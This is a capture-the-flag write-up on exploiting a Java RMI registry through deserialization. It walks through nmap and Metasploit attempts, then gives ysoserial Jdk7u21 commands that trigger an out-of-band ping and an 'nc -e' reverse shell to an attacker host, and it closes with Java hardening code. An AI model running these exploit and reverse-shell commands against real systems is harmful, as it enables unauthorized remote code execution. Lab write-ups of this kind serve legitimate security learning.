As the challenge description says, we can nmap this port.

```
Nmap scan report for jh2i.com (161.35.252.71)
Host is up (0.14s latency).

PORT      STATE SERVICE  VERSION
50028/tcp open  java-rmi Java RMI
```

After some googling I tried this nmap script, which reported the registry as vulnerable.

```
nmap -sV --script "rmi-vuln-classloader" -p 50028 jh2i.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-13 09:57 MSK
Nmap scan report for jh2i.com (161.35.252.71)
Host is up (0.14s latency).

PORT      STATE SERVICE  VERSION
50028/tcp open  java-rmi Java RMI
| rmi-vuln-classloader:
|   VULNERABLE:
|   RMI registry default configuration remote code execution vulnerability
|     State: VULNERABLE
|       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
|     References:
|_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
```

There is a Metasploit module that exploits this kind of configuration, but for an unknown reason the exploit failed (the RMI server did not fetch the remote class from my URL):

```
msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started HTTP reverse handler on http://<attacker_ip>:13001
[*] 161.35.252.71:50028 - Using URL: http://<attacker_ip>:8080/4rAP7YrTVS4Ad
[*] 161.35.252.71:50028 - Server started.
[*] 161.35.252.71:50028 - Sending RMI Header...
[*] 161.35.252.71:50028 - Sending RMI Call...
[-] 161.35.252.71:50028 - Exploit failed: RuntimeError Exploit aborted due to failure unknown The RMI class loader couldnt find the payload
[*] 161.35.252.71:50028 - Server stopped.
[*] Exploit completed, but no session was created.
```

After that I googled more about how RMI works and discovered that it uses Java serialization. That is when I downloaded a fresh `ysoserial.jar` and started to play with it.

`ysoserial` ships a number of payloads (gadget chains), and because I had no idea which classes were loaded on the target, I simply went down the list. Most of the payloads crashed with an error like this one, meaning the gadget's classes are not on the server's classpath:

```
java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is:
java.lang.ClassNotFoundException: <class_name_from_ysoserial_payload>
```
However, when I used this command the error was different:

`java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit jh2i.com 50028 Jdk7u21 'ping -c 1 8bkxpcnklb88m503jvyao24rui08ox.burpcollaborator.net'`

I went to check my Collaborator window and it had DNS requests! That means we have blind code execution :)

![dns_requests](https://sun6-14.userapi.com/31FQUE5JPhK1qs21OfcwWf91M8zXhtgcq38bVg/_HPgL1IY-xk.jpg)

After that I tried some reverse shell payloads and, luckily for me, the target had an old `nc` that supported the `-e` flag. So I fired the next command:

`java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit jh2i.com 50028 Jdk7u21 'nc -e /bin/sh <attacker_ip> 1337'`

And on my box, on port 1337, I got a shell!

```
nc -lvnp 1337
listening on [any] 1337 ...
connect to [<attacker_ip>] from (UNKNOWN) [142.93.62.145] 48634
id
uid=1000(user) gid=1000(user) groups=1000(user)
ls
flag.txt
cat flag.txt
flag{why_is_my_roommate_so_serious}
```
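Both findings above are server-side configuration issues: the nmap script flags class loading from a caller-supplied codebase, and the `Jdk7u21` run shows the registry deserializing whatever classes a gadget chain names. As an added example that is not code from the writeup or its target, here is a small RMI service hardened against both on JDK 9+ (the `Echo` interface, `EchoImpl` and the class name are hypothetical):

```java
import java.io.ObjectInputFilter;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;

public class HardenedRmiServer {

    // Hypothetical remote interface: the only type this service exposes.
    public interface Echo extends Remote {
        String echo(String msg) throws RemoteException;
    }

    static class EchoImpl implements Echo {
        public String echo(String msg) { return "echo: " + msg; }
    }

    // JEP 290 allowlist for the arguments of every call on the exported object.
    // echo() takes a String, so only that class is admitted; the classes a
    // ysoserial chain such as Jdk7u21 is built from are rejected by name before
    // ObjectInputStream instantiates them. maxdepth/maxarray bound the work a
    // hostile stream can force during unmarshalling.
    static final ObjectInputFilter ECHO_ARGS_FILTER = ObjectInputFilter.Config
            .createFilter("maxdepth=5;maxarray=1024;java.lang.String;!*");

    public static void main(String[] args) throws Exception {
        // Closes the rmi-vuln-classloader finding: never load classes from a
        // codebase URL the caller annotates the stream with. True by default
        // since 7u21; setting it here keeps a stray -D...useCodebaseOnly=false
        // on the command line from reopening it.
        System.setProperty("java.rmi.server.useCodebaseOnly", "true");

        // Three-argument overload (JDK 9+): RMI installs the filter on the
        // MarshalInputStream for this object, so arguments are checked before
        // any readObject() completes.
        Echo stub = (Echo) UnicastRemoteObject.exportObject(new EchoImpl(), 0,
                ECHO_ARGS_FILTER);

        // The registry has its own built-in allowlist (String, Number, Remote
        // stubs, socket factories) since 8u121/9 and takes a further filter
        // via the sun.rmi.registry.registryFilter system property.
        Registry registry = LocateRegistry.createRegistry(Registry.REGISTRY_PORT);
        registry.rebind("echo", stub);
        System.out.println("Echo exported with a deserialization allowlist");
    }
}
```

With this in place a gadget payload sent as a call argument fails at the filter with an `InvalidClassException` ("filter status: REJECTED") instead of the `ClassNotFoundException` seen above, and the rejection shows up in the server log rather than depending on the class happening to be absent.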

Thanks for reading :)